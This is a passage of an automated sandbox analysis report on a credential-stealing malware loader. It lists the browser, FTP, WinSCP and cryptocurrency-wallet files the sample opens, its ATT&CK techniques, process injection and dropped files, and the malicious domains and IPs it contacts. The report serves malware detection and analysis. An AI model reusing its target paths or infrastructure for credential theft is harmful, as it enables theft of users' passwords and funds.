                              Source: Yara matchFile source: Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948, type: MEMORYSTR
                              Source: Yara matchFile source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPE
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exeString found in binary or memory: Electrum
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exeString found in binary or memory: \ElectronCash\wallets
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exe, 00000009.00000000.1618549346.0000000000887000.00000002.00000001.01000000.00000010.sdmpString found in binary or memory: s\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)CLR_v2.0PlaceholderTileLogoFolderVirtualStoreWindows Photo ViewerjnlgamecbpmbajjfhmmmlhejkemejdmaRealPlayerRealNetworksSYACOneDrive\.pngPower BI DesktopSystemCertificatesVaultemojiBlizzard EntertainmentBattle.netODISpaint.netAmpMeltytech.openshot_qtMusic
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exeString found in binary or memory: com.liberty.jaxx
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exeString found in binary or memory: s\Exodus\backup
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exeString found in binary or memory: Exodus\
                              Source: v7u3knm8W6_1U6jDWPH31qsx.exeString found in binary or memory: Ethereum (UTC)
                              Source: SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exeString found in binary or memory: set_UseMachineKeyStore
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.js
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqlite
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                              Source: C:\Users\user\Documents\iofolko5\v7u3knm8W6_1U6jDWPH31qsx.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\key4.dbJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\cookies.sqlite
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\Cache\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\db\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                              Source: C:\Users\user\Documents\iofolko5\Zt2eeOHcoNwxYT3C9R8h67os.exeDirectory queried: C:\Users\user\Documents\iofolko5
                              Source: Yara matchFile source: 0000001D.00000002.2552634631.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000002.2354690717.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932, type: MEMORYSTR

                              Remote Access Functionality

                              barindex
                              Source: Yara matchFile source: Process Memory Space: v7u3knm8W6_1U6jDWPH31qsx.exe PID: 7932, type: MEMORYSTR
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 00000011.00000002.2757239787.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000011.00000000.1618173689.00007FF6B1DCB000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 7504, type: MEMORYSTR
                              Source: Yara matchFile source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000017.00000002.1704277964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000E.00000002.1829361336.0000000004155000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: dump.pcap, type: PCAP
                              Source: Yara matchFile source: 29.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 13.2.RK8ajtyf9pvKlaXEo3EjTbnu.exe.37b5570.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000001D.00000002.2448826629.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000D.00000002.1840912575.00000000037B5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: RK8ajtyf9pvKlaXEo3EjTbnu.exe PID: 7964, type: MEMORYSTR
                              Source: Yara matchFile source: 00000021.00000002.2871041032.0000000008B51000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.2512039458.0000000002610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000C.00000002.2510215507.0000000002561000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000002.2812741708.0000000002D0B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000023.00000002.2813195969.0000000002DB1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                              Source: Yara matchFile source: 31.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 31.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.LeVSNPB9FLpXmtLG7mcICpEf.exe.3265570.1.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000B.00000002.1884059760.0000000003265000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000002.2425101444.00000000012EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000002.2354690717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000001F.00000002.2425101444.000000000127A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: LeVSNPB9FLpXmtLG7mcICpEf.exe PID: 7948, type: MEMORYSTR
                              Source: Yara matchFile source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 14.2.kCxbYlQ2A6NZXLbKZjtnUx3R.exe.4155570.0.unpack, type: UNPACKEDPE
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              Abuse Elevation Control Mechanism
                              11
                              Disable or Modify Tools
                              2
                              OS Credential Dumping
                              1
                              System Time Discovery
                              Remote Services11
                              Archive Collected Data
                              12
                              Ingress Tool Transfer
                              Exfiltration Over Other Network Medium1
                              System Shutdown/Reboot
                              CredentialsDomainsDefault Accounts11
                              Native API
                              1
                              Windows Service
                              1
                              DLL Side-Loading
                              11
                              Deobfuscate/Decode Files or Information
                              1
                              Credential API Hooking
                              1
                              Account Discovery
                              Remote Desktop Protocol41
                              Data from Local System
                              21
                              Encrypted Channel
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts1
                              Exploitation for Client Execution
                              1
                              Scheduled Task/Job
                              1
                              Access Token Manipulation
                              1
                              Abuse Elevation Control Mechanism
                              1
                              Credentials in Registry
                              13
                              File and Directory Discovery
                              SMB/Windows Admin Shares1
                              Credential API Hooking
                              1
                              Non-Standard Port
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal Accounts2
                              Command and Scripting Interpreter
                              121
                              Registry Run Keys / Startup Folder
                              1
                              Windows Service
                              3
                              Obfuscated Files or Information
                              NTDS258
                              System Information Discovery
                              Distributed Component Object ModelInput Capture3
                              Non-Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud Accounts1
                              Scheduled Task/Job
                              Network Logon Script611
                              Process Injection
                              1
                              Install Root Certificate
                              LSA Secrets891
                              Security Software Discovery
                              SSHKeylogging124
                              Application Layer Protocol
                              Scheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                              Scheduled Task/Job
                              4
                              Software Packing
                              Cached Domain Credentials471
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items121
                              Registry Run Keys / Startup Folder
                              1
                              Timestomp
                              DCSync2
                              Process Discovery
                              Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                              DLL Side-Loading
                              Proc Filesystem1
                              Application Window Discovery
                              Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                              Masquerading
                              /etc/passwd and /etc/shadow3
                              System Owner/User Discovery
                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron471
                              Virtualization/Sandbox Evasion
                              Network Sniffing1
                              Remote System Discovery
                              Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                              Access Token Manipulation
                              Input Capture1
                              System Network Configuration Discovery
                              Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task611
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1514956 Sample: SecuriteInfo.com.Win32.Cryp... Startdate: 21/09/2024 Architecture: WINDOWS Score: 100 117 45.202.35.101 ONL-HKOCEANNETWORKLIMITEDHK Seychelles 2->117 119 tventyvf20pt.top 2->119 121 12 other IPs or domains 2->121 145 Multi AV Scanner detection for domain / URL 2->145 147 Suricata IDS alerts for network traffic 2->147 149 Found malware configuration 2->149 151 30 other signatures 2->151 11 SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe 1 2->11         started        15 jewkkwnf.exe 2->15         started        17 svchost.exe 2->17         started        19 2 other processes 2->19 signatures3 process4 dnsIp5 113 SecuriteInfo.com.W...27124.19662.exe.log, ASCII 11->113 dropped 177 Writes to foreign memory regions 11->177 179 Allocates memory in foreign processes 11->179 181 Injects a PE file into a foreign processes 11->181 22 RegAsm.exe 39 11->22         started        183 Multi AV Scanner detection for dropped file 15->183 185 Machine Learning detection for dropped file 15->185 27 WerFault.exe 17->27         started        123 127.0.0.1 unknown unknown 19->123 file6 signatures7 process8 dnsIp9 127 103.130.147.211, 49712, 80 MYREPUBLIC-AS-IDPTEkaMasRepublikID Turkey 22->127 129 176.111.174.109, 49710, 49718, 80 WILWAWPL Russian Federation 22->129 131 9 other IPs or domains 22->131 87 C:\Users\...\v7u3knm8W6_1U6jDWPH31qsx.exe, PE32 22->87 dropped 89 C:\Users\...\u7IEXZpDnp1f9d_IZKWnjEtv.exe, PE32+ 22->89 dropped 91 C:\Users\...\pZhQ7nTCR9R3A5r5QIQYLapT.exe, PE32 22->91 dropped 93 23 other malicious files 22->93 dropped 153 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 22->153 155 Drops PE files to the document folder of the user 22->155 157 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 22->157 159 2 other signatures 22->159 29 LeVSNPB9FLpXmtLG7mcICpEf.exe 2 22->29         started        32 kvOccCLzMNloI4W4GuGOaRuh.exe 2 22->32         started        35 pZhQ7nTCR9R3A5r5QIQYLapT.exe 22->35         started        37 9 other processes 22->37 file10 signatures11 process12 dnsIp13 187 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 29->187 189 Writes to foreign memory regions 29->189 191 Allocates memory in foreign processes 29->191 193 Injects a PE file into a foreign processes 29->193 40 RegAsm.exe 29->40         started        45 conhost.exe 29->45         started        57 3 other processes 29->57 77 C:\Users\...\kvOccCLzMNloI4W4GuGOaRuh.tmp, PE32 32->77 dropped 47 kvOccCLzMNloI4W4GuGOaRuh.tmp 32->47         started        195 Detected unpacking (changes PE section rights) 35->195 197 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 35->197 199 Maps a DLL or memory area into another process 35->199 207 3 other signatures 35->207 49 explorer.exe 35->49 injected 125 tventyvf20pt.top 5.53.124.195 SELECTELRU Russian Federation 37->125 79 C:\Users\user\...\ClientSecureUpdater.exe, PE32 37->79 dropped 81 C:\Users\user\AppData\...\service123.exe, PE32 37->81 dropped 83 C:\Users\user\...\MvOwPcqDrYVlvFIqJren.dll, PE32 37->83 dropped 85 C:\ProgramData\...\orpqcnvisucm.exe, PE32+ 37->85 dropped 201 Detected unpacking (creates a PE file in dynamic memory) 37->201 203 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 37->203 205 Drops PE files to the document folder of the user 37->205 209 9 other signatures 37->209 51 Zt2eeOHcoNwxYT3C9R8h67os.exe 37->51         started        53 RegAsm.exe 37->53         started        55 RegAsm.exe 37->55         started        59 8 other processes 37->59 file14 signatures15 process16 dnsIp17 133 cowod.hopto.org 45.132.206.251 LIFELINK-ASRU Russian Federation 40->133 135 116.203.165.127 HETZNER-ASDE Germany 40->135 137 steamcommunity.com 23.197.127.21 AKAMAI-ASN1EU United States 40->137 107 8 other files (6 malicious) 40->107 dropped 161 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 40->161 163 Tries to harvest and steal ftp login credentials 40->163 165 Tries to harvest and steal browser information (history, passwords, etc) 40->165 167 Tries to harvest and steal Bitcoin Wallet information 40->167 95 C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+ 47->95 dropped 97 C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32 47->97 dropped 99 C:\Users\user\...\videocompressor32.exe, PE32 47->99 dropped 109 15 other files (8 malicious) 47->109 dropped 61 videocompressor32.exe 47->61         started        101 C:\Users\user\AppData\Roaming\ahcsduh, PE32 49->101 dropped 169 Benign windows process drops PE files 49->169 139 92.119.114.169 ON-LINE-DATAServerlocation-NetherlandsDrontenNL Ukraine 51->139 103 Zt2eeOHcoNwxYT3C9R...KsjF1QTDth5a (copy), PE32 51->103 dropped 105 C:\Users\user\AppData\...\PowerExpertNNT.exe, PE32 51->105 dropped 111 3 other malicious files 51->111 dropped 171 Creates multiple autostart registry keys 51->171 65 schtasks.exe 51->65         started        67 Conhost.exe 51->67         started        141 193.233.255.84 FREE-NET-ASFREEnetEU Russian Federation 53->141 173 Installs new ROOT certificates 53->173 175 Tries to steal Crypto Currency Wallets 53->175 69 conhost.exe 55->69         started        71 conhost.exe 59->71         started        73 conhost.exe 59->73         started        file18 signatures19 process20 dnsIp21 143 ckmqpoy.net 185.196.8.214 SIMPLECARRER2IT Switzerland 61->143 115 C:\...\DV Sample Construct 9.21.45.exe, PE32 61->115 dropped 75 conhost.exe 65->75         started        file22 process23

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe71%ReversingLabsByteCode-MSIL.Trojan.PrivateLoader
                              SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe42%VirustotalBrowse
                              SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exe100%AviraTR/Dropper.Gen
                              C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe100%Joe Sandbox ML
                              C:\ProgramData\DV Sample Construct 9.21.45\DV Sample Construct 9.21.45.exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vsfdhgg15[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe100%Joe Sandbox ML
                              C:\ProgramData\jewkkwnf\jewkkwnf.exe100%Joe Sandbox ML
                              C:\ProgramData\AKEGHIJJEH.exe79%ReversingLabsWin32.Spyware.Lummastealer
                              C:\ProgramData\AKEGHIJJEH.exe70%VirustotalBrowse
                              C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe54%ReversingLabsWin64.Trojan.Privateloader
                              C:\ProgramData\ejitkpfdxvzt\orpqcnvisucm.exe64%VirustotalBrowse
                              C:\ProgramData\freebl3.dll0%ReversingLabs
                              C:\ProgramData\freebl3.dll0%VirustotalBrowse
                              C:\ProgramData\jewkkwnf\jewkkwnf.exe42%ReversingLabsByteCode-MSIL.Trojan.PrivateLoader
                              C:\ProgramData\jewkkwnf\jewkkwnf.exe33%VirustotalBrowse
                              C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)42%ReversingLabsByteCode-MSIL.Trojan.PrivateLoader
                              C:\ProgramData\jewkkwnf\jewkkwnf.exeWqTnzVEcT35t5u1k (copy)33%VirustotalBrowse
                              C:\ProgramData\mozglue.dll0%ReversingLabs
                              C:\ProgramData\mozglue.dll0%VirustotalBrowse
                              C:\ProgramData\msvcp140.dll0%ReversingLabs
                              C:\ProgramData\msvcp140.dll0%VirustotalBrowse
                              C:\ProgramData\nss3.dll0%ReversingLabs
                              C:\ProgramData\nss3.dll0%VirustotalBrowse
                              C:\ProgramData\softokn3.dll0%ReversingLabs
                              C:\ProgramData\softokn3.dll0%VirustotalBrowse
                              C:\ProgramData\vcruntime140.dll0%ReversingLabs
                              C:\ProgramData\vcruntime140.dll0%VirustotalBrowse
                              C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe42%ReversingLabsByteCode-MSIL.Trojan.PrivateLoader
                              C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe33%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe54%ReversingLabsWin64.Trojan.Privateloader
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ea645129e6a_jacobs[1].exe64%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exe79%ReversingLabsWin32.Spyware.Lummastealer
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\66ecb454d2b4a_lgfdsjgds[1].exe70%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe26%ReversingLabsWin32.Trojan.Cerbu
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\vfsdgdf[1].exe40%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ebb3bf78bd6_Send[1].exe62%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\66ebb3bf78bd6_Send[1].exe56%VirustotalBrowse
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\easyfirewall[1].exe13%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\HI1BCF07\easyfirewall[1].exe26%VirustotalBrowse
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              s3-w.us-east-1.amazonaws.com0%VirustotalBrowse
                              tventyvf20pt.top0%VirustotalBrowse
                              cowod.hopto.org1%VirustotalBrowse
                              nwgrus.ru1%VirustotalBrowse
                              nerv.com.pe6%VirustotalBrowse
                              bitbucket.org1%VirustotalBrowse
                              api64.ipify.org0%VirustotalBrowse
                              steamcommunity.com0%VirustotalBrowse
                              ipinfo.io0%VirustotalBrowse
                              bbuseruploads.s3.amazonaws.com3%VirustotalBrowse
                              iplogger.org0%VirustotalBrowse
                              No Antivirus matches
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              s3-w.us-east-1.amazonaws.com
                              54.231.236.201
                              truefalse
                              bitbucket.org
                              185.166.143.48
                              truefalse
                              ckmqpoy.net
                              185.196.8.214
                              truetrue
